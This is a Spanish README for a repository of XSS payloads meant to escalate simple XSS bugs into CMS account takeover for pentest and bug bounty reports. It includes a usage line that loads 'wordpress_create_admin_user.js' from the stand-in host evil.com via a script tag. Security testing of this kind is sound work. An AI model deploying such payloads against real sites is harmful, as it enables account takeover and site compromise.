
XSS payloads designed to turn alert(1) into P1
Payloads XSS diseñados para convertir alert(1) en un P1.
Este repositorio se publicó junto con un artículo de blog titulado "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
En este repositorio encontrarás un montón de archivos JavaScript que se pueden cargar en un payload XSS para realizar funciones sensibles en plataformas CMS populares dentro del contexto del navegador de la víctima. Esto puede ayudar a encadenar un simple bug XSS con algo más crítico, como la toma de control de una cuenta.
Es perfecto para reforzar la severidad de un informe de pentest o bug bounty demostrando un impacto de seguridad real.
Los payloads se van añadiendo poco a poco, a medida que tengo tiempo. Aún quedan muchos más por venir; si puedes ayudar, ¡las pull requests son bienvenidas! Si buscas inspiración sobre qué crear, consulta la pestaña de "issues" de este repositorio.
La forma más sencilla de usar estos payloads es alojarlos en algún lugar y cargarlos en el atributo src de una etiqueta script para tu payload XSS, así:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
Alternativamente, dependiendo del contexto y la longitud del payload, a veces puede ser minificado, codificado y luego simplemente incluido directamente en la petición.
Para alojar el archivo JavaScript, puede que necesites establecer el Content-Type a application/javascript. Para lograrlo con PHP, simplemente añade esta línea al principio de cualquiera de los payloads, guárdalo como un archivo .php y alójalo en tu servidor web con PHP habilitado:
<?php header("Content-Type: application/javascript"); ?>
Este artículo de Shift8 es lo que me inspiró a crear este repositorio. El JS del artículo tiene un par de errores tipográficos menores, pero los conceptos son muy acertados.